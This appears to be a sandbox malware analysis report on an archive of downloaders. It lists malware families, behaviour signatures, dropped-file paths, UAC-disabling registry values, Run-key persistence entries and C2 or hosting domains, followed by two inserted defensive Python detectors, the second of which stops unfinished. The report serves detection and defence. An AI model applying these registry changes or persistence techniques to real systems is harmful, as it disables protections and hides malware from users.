Malware Analysis Report

2025-01-22 20:39

Sample ID 241212-wy4dxsvkcp
Target Downloaders.zip
SHA256 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Tags
amadey asyncrat gh0strat gurcu hive lockbit lumma meduza phorphiex quasar redline vidar xworm 14082024 4bee07 a21440e9f7223be06be5f5e2f94969c7 default newbundle2 office04 runtimebroker svhost collection credential_access defense_evasion discovery evasion execution infostealer loader persistence phishing privilege_escalation pyinstaller ransomware rat spyware stealer trojan upx worm 44caliber discordrat rms stealc umbral qqtalk2 voov1 voov3 rootkit qqtalk qqtalk1 voov voov2 azorult remcos xmrig tg@cvv88888 miner vmprotect
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral5 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral6 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score 10/10

SHA256 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Threat Level: Known bad

The file Downloaders.zip was found to be: Known bad.

Malicious Activity Summary

Gurcu, WhiteSnake

Redline family

Gurcu family

RMS

Stealc family

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

Stealc

Remcos family

RedLine

Quasar RAT

Discord RAT

44Caliber family

Xworm

Quasar payload

Detect Umbral payload

Gh0st RAT payload

Remcos

Xworm family

Umbral family

Lumma Stealer, LummaC

xmrig

Quasar family

RedLine payload

Gh0strat family

Lockbit family

Umbral

Rule to detect Lockbit 3.0 ransomware Windows payload

Asyncrat family

AsyncRat

Detects Go variant of Hive Ransomware

Azorult

44Caliber

Xmrig family

Lockbit

Lumma family

UAC bypass

Amadey family

Detect Xworm Payload

Meduza

Rms family

Vidar family

Hive

Discordrat family

Meduza Stealer payload

Hive family

Vidar

Phorphiex family

Phorphiex payload

Meduza family

Phorphiex, Phorpiex

Gh0strat

Suspicious use of NtCreateProcessExOtherParentProcess

Detect Vidar Stealer

Azorult family

Detected Nirsoft tools

Enumerates VirtualBox registry keys

XMRig Miner payload

Async RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Stops running service(s)

Uses browser remote debugging

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Adds policy Run key to start application

Modifies Windows Firewall

Sets file to hidden

VMProtect packed file

A potential corporate email address has been identified in the URL: 3SCET_Admin@OFGADUSE_report.wsr

Reads data files stored by FTP clients

Checks computer location settings

Reads user/profile data of web browsers

Indicator Removal: Clear Windows Event Logs

Identifies Wine through registry keys

A potential corporate email address has been identified in the URL: oDRAV_Admin@OFGADUSE_report.wsr

A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr

Checks BIOS information in registry

Loads dropped DLL

Clipboard Data

Drops startup file

Unsecured Credentials: Credentials In Files

A potential corporate email address has been identified in the URL: naAjO_Admin@OFGADUSE_report.wsr

Reads WinSCP keys stored on the system

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Power Settings

Indicator Removal: File Deletion

Enumerates connected drives

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Obfuscated Files or Information: Command Obfuscation

Network Service Discovery

Blocklisted process makes network request

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

UPX packed file

AutoIT Executable

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Event Triggered Execution: Installer Packages

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

System Network Configuration Discovery: Internet Connection Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

Program crash

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

Uses Volume Shadow Copy service COM API

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

outlook_win_path

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

outlook_office_path

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Runs ping.exe

Modifies registry key

Gathers system information

Modifies registry class

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

Kills process with taskkill

GoLang User-Agent

Runs .reg file with regedit

Suspicious behavior: MapViewOfSection

Detects videocard installed

Suspicious use of WriteProcessMemory

Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-12 18:20

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

130s

Max time network

301s

Command Line

sihost.exe

Signatures

Amadey

trojan amadey

Amadey family

amadey

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Vidar Stealer

stealer
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Detects Go variant of Hive Ransomware

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Gh0st RAT payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Hive

ransomware hive

Hive family

hive

Lockbit

ransomware lockbit

Lockbit family

lockbit

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Meduza

stealer meduza

Meduza Stealer payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Meduza family

meduza

Phorphiex family

phorphiex

Phorphiex payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

RedLine

infostealer redline

RedLine payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Redline family

redline

Rule to detect Lockbit 3.0 ransomware Windows payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A

Sets file to hidden

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\attrib.exe | N/A

A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr

phishing

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1989129625.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE | N/A

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\test14.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\pp.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A
N/A | N/A | C:\Windows\sysnldcvmr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1989129625.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2309417675.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\build555.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\262965725.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\steel.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\281730318.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3161510603.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\test26.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\clip.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\System.exe | N/A
N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe | N/A
N/A | N/A | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\svhost\svhost.exe | N/A
N/A | N/A | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe | N/A
N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\builder.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\crack.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\4434.exe | N/A
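
Several of the dropped executables in the table above reuse or misspell the names of Windows and vendor binaries: svchost.exe under Temp, RuntimeBroker.exe under system32\devtun, "Runtime Broker.exe" under Roaming\SubDir, svhost.exe, and (in the "Drops file in Program Files directory" rows further down) chrome11.exe writing chrome.exe into Chrome's real install directory. The Python below is an added example, not part of the report or of any tool it names: it flags a known binary name outside its legitimate directory, a one-character lookalike of a known name, and a known binary in its genuine location rewritten from a user-writable path. EXPECTED_HOMES is this example's own allowlist (an assumption), and the sample paths are copied from the table above.

```python
"""Flag dropped executables that borrow or misspell the name of a Windows or
vendor binary (ATT&CK T1036, Masquerading).  Added example, not part of the
report: EXPECTED_HOMES is this example's own allowlist of where those binaries
legitimately live, and SAMPLE_PATHS are copied from the table above."""
import ntpath

# Directories in which each well-known binary legitimately lives (assumption
# for this example; build the real list from a clean reference image).
EXPECTED_HOMES = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "runtimebroker.exe": {r"c:\windows\system32"},
    "chrome.exe": {r"c:\program files\google\chrome\application",
                   r"c:\program files (x86)\google\chrome\application"},
}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")


def normalize_name(name):
    """Lower-case and drop spaces, so 'Runtime Broker.exe' compares as runtimebroker.exe."""
    return name.lower().replace(" ", "")


def levenshtein(a, b):
    """Edit distance; used to catch one-character lookalikes such as svhost.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_path(path):
    """Findings for one executable path as (finding, well-known name imitated)."""
    directory, name = ntpath.split(path)
    directory, norm = directory.lower(), normalize_name(name)
    if norm in EXPECTED_HOMES:
        # Exact directory match on purpose: a startswith() test would accept
        # C:\Windows\system32\devtun\RuntimeBroker.exe as legitimate.
        return [] if directory in EXPECTED_HOMES[norm] else [("system_name_wrong_dir", norm)]
    return sorted(("lookalike_name", known) for known in EXPECTED_HOMES if levenshtein(norm, known) == 1)


def check_drop(writer, target):
    """Findings when `writer` creates or modifies `target` (a file event)."""
    target_dir, target_name = ntpath.split(target)
    norm = normalize_name(target_name)
    in_real_home = target_dir.lower() in EXPECTED_HOMES.get(norm, set())
    if in_real_home and writer.lower().startswith(USER_WRITABLE):
        # A binary in its genuine location rewritten by something running
        # from a user-writable directory, as chrome11.exe does to chrome.exe.
        return [("legit_binary_overwritten_from_user_dir", norm)]
    return []


SAMPLE_PATHS = [  # copied from the 'Executes dropped EXE' rows above
    r"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe",
    r"C:\Windows\system32\devtun\RuntimeBroker.exe",
    r"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe",
    r"C:\Users\Admin\AppData\Roaming\svhost\svhost.exe",
    r"C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe",
]

if __name__ == "__main__":
    for path in SAMPLE_PATHS:
        print(path, check_path(path))
    print(check_drop(r"C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe",
                     r"C:\Program Files\Google\Chrome\Application\chrome.exe"))
```

The directory comparison is deliberately exact rather than a prefix test: the devtun\RuntimeBroker.exe path in this report sits underneath system32 and would pass a startswith() check. Names such as sysnldcvmr.exe or Amadey.exe produce no finding here; they need a different heuristic (unsigned binary written to C:\Windows, Run-key or Tasks persistence), which this check does not attempt.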

Identifies Wine through registry keys

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\ama.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\2910514938.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Roaming\\System.exe" | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | 0.tcp.eu.ngrok.io | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A
N/A | api.ipify.org | N/A | N/A
N/A | ip-api.com | N/A | N/A
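
The two tables above list the network indicators (an ngrok tunnel endpoint, raw GitHub content, and two external-IP lookup services) without attributing them to a process. The Python below is an added example, not part of the report: it takes DNS-query log lines of a constructed `<timestamp> <process path> <qname>` form (the process attribution in SAMPLE_LOG is made up, not taken from the sandbox), matches names against those indicators on label boundaries, and rates each process by the combination it resolved. The category weights are this example's own assumption: an IP lookup or a raw GitHub fetch on its own is common in benign software, while a tunnel endpoint is not.

```python
"""Rate processes by the network indicators they resolve.  Added example,
not part of the report: the domains come from the two tables above, the
log format and the process attribution in SAMPLE_LOG are constructed (the
report lists these names without a process), and the severity weights are
this example's own assumption."""
from collections import defaultdict

INDICATORS = {
    "tunnel": ("ngrok.io",),                       # 0.tcp.eu.ngrok.io in the report
    "raw_code_hosting": ("raw.githubusercontent.com",),
    "ip_lookup": ("api.ipify.org", "ip-api.com"),
}


def categorize(qname):
    """Indicator category for a queried name, or None.

    Matching is on label boundaries: '0.tcp.eu.ngrok.io' is a hit, 'notngrok.io'
    is not.  Names are lower-cased and a trailing dot is stripped first."""
    name = qname.lower().rstrip(".")
    for category, suffixes in INDICATORS.items():
        if any(name == s or name.endswith("." + s) for s in suffixes):
            return category
    return None


def parse_dns_line(line):
    """Split '<timestamp> <process path> <qname>'; the path may contain spaces."""
    timestamp, rest = line.split(" ", 1)
    process, qname = rest.rsplit(" ", 1)
    return timestamp, process, qname


def severity(categories):
    """Verdict for the set of categories one process resolved."""
    if "tunnel" in categories:
        return "high"     # an inbound tunnel has no place on an ordinary endpoint
    if len(categories) >= 2:
        return "medium"   # e.g. payload fetched from GitHub, then the victim geolocated
    if categories:
        return "low"      # an IP lookup or raw GitHub alone is common in benign software
    return "none"

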